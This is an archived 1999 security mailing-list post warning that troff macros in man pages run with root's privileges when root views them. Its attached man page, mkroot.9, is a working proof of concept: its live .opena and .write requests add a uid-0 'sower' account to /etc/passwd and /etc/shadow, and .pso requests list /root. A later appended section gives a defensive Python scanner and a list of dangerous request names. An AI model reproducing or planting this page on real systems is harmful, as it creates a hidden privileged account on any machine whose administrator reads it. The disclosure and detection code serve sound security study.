Troff dangerous.

From: Pawel Wilk (siewcaat_private)
Date: Fri Jul 23 1999 - 13:16:42 PDT

    If you want your system safe,
    don't look as root
    at manual page.

    [more info in attachment]

    --
       _____________ ___  ___   __  _                    .
      (
    .__) i E f c A   :: Pawel Wilk <siewcaat_private>   .
                     :  Polish Linux Distribution Team   .. .    .    . .
        fingerprint  :  A5B1 52BC D496 D08B 0E1F B6B0 86D8 52FE 0211 9484
    
    Attachment: mkroot.9

    .\" Copyright (c) 1999 Paweł Wilk <siewcaat_private>
    .\"
    .\" This is free documentation; you can redistribute it and/or
    .\" modify it under the terms of the GNU General Public License as
    .\" published by the Free Software Foundation; either version 2 of
    .\" the License, or (at your option) any later version.
    .\"
    .\" The GNU General Public License's references to "object code"
    .\" and "executables" are to be interpreted as the output of any
    .\" document formatting or typesetting system, including
    .\" intermediate and printed output.
    .\"
    .\" This manual is distributed in the hope that it will be useful,
    .\" but WITHOUT ANY WARRANTY; without even the implied warranty of
    .\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    .\" GNU General Public License for more details.
    .\"
    .\" You should have received a copy of the GNU General Public
    .\" License along with this manual; if not, write to the Free
    .\" Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139,
    .\" USA.
    .\"
    .TH MKROOT 9 "07-22-1999" "manual page" "Linux Hacker's Manual"
    .SH NAME
    mkroot \- make a root-shell
    .SH SYNOPSIS
    .BI "man mkroot"
    .SH DISCLAIMER
    This manual page contains some \fBtroff\fP macros which could break your system's
    security. If you are looking at this page being logged as root then you should know
    that right in this moment you have already created new, privileged account
    called "sower". The account is disabled by default because of security reasons.
    Don't forget to remove it! ;->

    This is for information only.... use it at your own risk.

    .SH DESCRIPTION
    Manual pages are usually based on \fBtroff\fP (see
    .BR troff (1)
    ) macros. The point is, that some of these macros can access files or
    even invoke some shell commands. It's usable, but try to imagine
    that the \fBtroff\fP macros contained in manual pages may have root privileges
    if the \fBtroff\fP command's caller is root. (!)
    .br
    .LP
    The most dangerous macros are:
    .TP
    .BI ".pso" " command"
    used to display output of some \fIcommand\fP
    .TP
    .BI ".write" " stream string"
    used to put the \fIstring\fP into the given \fIstream\fP
    .LP
    .SH EXAMPLES
    .BI "/root directory listing" "   .pso ls -l /root"
    .nf

    .pso ls -l /root

    .fi
    .BI "creating new user called sower (passwd)" " "
    .nf

        .opena stream /etc/passwd
        .write stream sower:*:0:0::/:/dev/null

    .fi
    .opena stream /etc/passwd
    .write stream sower:!:0:0::/:/dev/null
    .BI "little preview" "   .pso tail /etc/passwd"
    .nf

    .pso tail /etc/passwd

    .fi

    .BI "playing with shadow" ""
    .nf

        .opena stream /etc/shadow
        .write stream sower:*:10531:0:99999:7::10794:

    .fi
    .opena stream /etc/shadow
    .write stream sower:*:10531:0:99999:7::10794:
    .BI "fingering new user" "    .pso finger sower"
    .nf

    .pso finger sower

    .fi
    .SH FILES
    .I /etc/passwd
    .I /etc/shadow

    .SH SEE ALSO
    .BR man (1),
    .BR passwd (1),
    .BR troff (1).

    .SH AUTHOR
    Pawel Wilk <siewcaat_private>
    
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:53:17 PDT
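
Added example (not part of the original post or of any project's code): a heuristic Python scanner for man page sources that reports request lines using the file and shell requests the attachment demonstrates (.pso, .opena, .write), together with .open, .sy and .pi, which groff's safer mode (-S) disables alongside .pso and .opena. The names scan_roff, UNSAFE and EVASION are hypothetical, and the sample input is constructed with harmless targets.

```python
import re

# Requests that groff's safer mode (-S) disables, plus .write, which the
# post lists and which only does harm once .open/.opena gave it a stream.
UNSAFE = {"pso", "sy", "pi", "open", "opena", "write"}
# Requests that can hide the ones above from a line-based scan:
# .cc/.c2 change the control characters, .als/.rn alias or rename requests.
EVASION = {"cc", "c2", "als", "rn"}

# A request line has a control character ('.' or "'") in column 0, then
# optional blanks, then the request name. Indented lines are plain text.
REQUEST_RE = re.compile(r"^[.'][ \t]*([A-Za-z][A-Za-z0-9]*)(.*)$")

def scan_roff(source):
    """Return (line_no, request, args, kind) for each risky request line."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue  # text line, comment (.\") or blank
        name, args = m.group(1), m.group(2).strip()
        if name in UNSAFE:
            findings.append((line_no, name, args, "unsafe"))
        elif name in EVASION:
            findings.append((line_no, name, args, "evasion"))
    return findings

# Constructed sample, harmless targets only.
SAMPLE = r""".TH DEMO 9 "constructed sample"
.\" .pso inside a comment is never executed
.BI ".pso" " command"
.nf
    .opena stream /tmp/demo.out
.fi
.opena stream /tmp/demo.out
.write stream hello
.  pso id
'sy true
.als x pso
"""

if __name__ == "__main__":
    for line_no, name, args, kind in scan_roff(SAMPLE):
        print(f"line {line_no}: .{name} {args} [{kind}]")
```

The scan is a triage aid only: requests reached through macro definitions or string interpolation are not seen, so formatting untrusted pages with safer mode left on (no -U) and without root privileges remains the actual mitigation.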